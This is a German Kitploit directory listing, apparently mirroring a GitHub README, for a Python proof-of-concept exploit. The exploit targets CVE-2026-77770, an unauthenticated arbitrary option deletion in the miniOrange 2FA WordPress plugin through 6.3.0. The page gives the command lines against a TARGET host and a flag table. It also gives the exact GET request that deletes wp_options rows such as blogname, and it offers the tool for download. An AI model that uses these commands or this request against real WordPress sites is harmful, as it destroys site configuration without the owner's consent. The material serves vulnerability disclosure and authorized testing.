Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-77770 — Python-PoC für CVE-2026-77770, eine nicht authentifizierte Schwachstelle zur beliebigen Löschung von WordPress-Optionen im miniOrange 2FA-Plugin (<= 6.3.0) über den E-Mail-Verifizierungslink. | Kitploit
Tools/GitHubGitHub/cflowsec/cve-2026-77770
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubcflowsec/cve-2026-77770

CVE-2026-77770

Python-PoC für CVE-2026-77770, eine nicht authentifizierte Schwachstelle zur beliebigen Löschung von WordPress-Optionen im miniOrange 2FA-Plugin (<= 6.3.0) über den E-Mail-Verifizierungslink.

Repository anzeigen
vor 16h 26mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-77770

miniOrange 2FA CVE POC

miniOrange 2FA (WordPress-Plugin miniorange-2-factor-authentication) ≤ 6.3.0 — unauthentifizierte Löschung beliebiger WordPress-Optionen über den E-Mail-Verifizierungslink (userID / Txid / accessToken).

Nur für autorisierte Tests. Führen Sie dies nicht gegen Systeme aus, die Ihnen nicht gehören oder für die Sie keine Testgenehmigung haben.

Erfordert: Python 3, nur Standardbibliothek.

root@kitploit:~
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test --delete blogname
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u https://TARGET --delete blogname --insecure
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u TARGET --delete blogname
FlagWas es bewirkt
-u / --urlWordPress-Website-Stammverzeichnis (erforderlich). http:// oder https://; ein Hostname wird zuerst als HTTPS, dann als HTTP versucht. Selbstsigniertes TLS wird automatisch erneut versucht
--testGast: Plugin-Version + E-Mail-Verifizierungs-Popup
--delete OPTIONLöscht diese wp_options-Zeile. blogname ist über /wp-json/ sichtbar (BEFORE / AFTER)
--gate OPTIONOption, deren gespeicherter Wert 3 ist (das Txid-Gate). Wiederholbar. Standard: wp_page_for_privacy_policy, dann thread_comments_depth
--insecureTLS-Verifizierung überspringen
--timeoutHTTP-Timeout in Sekunden (Standard 30)

Unauthentifiziert. Das Gadget ist ein GET auf /?userID=OPTION&Txid=GATE&accessToken=x. GATE muss derzeit die Ganzzahl 3 enthalten. Bei Verfehlen des 5-Minuten-Fensters schreibt das Plugin außerdem GATE=0.

--test löscht nichts. --delete blogname ist der öffentliche Beweis (Website-Titel in /wp-json/ wird leer). 6.3.1 stellt Schlüsseln ein Präfix voran (mo2f_oobe_*), sodass unpräfixierte Namen nicht gelöscht werden.

Stdout: VERSION, HANDLER, PRESENT, SITENAME, OPTION, BEFORE, AFTER, GATE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, ATTEMPTED.

Funktionierender PoC

CVE: CVE-2026-77770. Plugin-Changelog 6.3.1.

Tool herunterladen